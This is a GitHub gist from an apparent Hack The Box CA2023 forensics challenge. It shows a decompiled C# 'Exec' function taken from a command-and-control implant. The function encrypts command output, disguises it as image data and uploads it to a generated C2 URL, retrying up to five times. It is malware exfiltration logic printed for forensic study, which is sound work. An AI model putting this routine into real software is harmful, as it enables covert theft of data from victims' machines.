Skip to content

Instantly share code, notes, and snippets.

@khr0x40sh
Created March 23, 2023 18:27
Show Gist options
  • Save khr0x40sh/9bf537c24da043b876edc5bd51ca9d13 to your computer and use it in GitHub Desktop.
Save khr0x40sh/9bf537c24da043b876edc5bd51ca9d13 to your computer and use it in GitHub Desktop.
HTB:CA2023 Forensics Interstellar EXEC C2 Function
// Program
// Token: 0x06000016 RID: 22 RVA: 0x00002C38 File Offset: 0x00000E38
public static void Exec(string cmd, string taskId, string key = null, byte[] encByte = null)
{
if (string.IsNullOrEmpty(key))
{
key = Program.pKey;
}
string cookie = Program.Encryption(key, taskId, false, null);
string s;
if (encByte != null)
{
s = Program.Encryption(key, null, true, encByte);
}
else
{
s = Program.Encryption(key, cmd, true, null);
}
byte[] cmdoutput = Convert.FromBase64String(s);
byte[] imgData = Program.ImgGen.GetImgData(cmdoutput);
int i = 0;
while (i < 5)
{
i++;
try
{
Program.GetWebRequest(cookie).UploadData(Program.UrlGen.GenerateUrl(), imgData);
i = 5;
}
catch
{
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment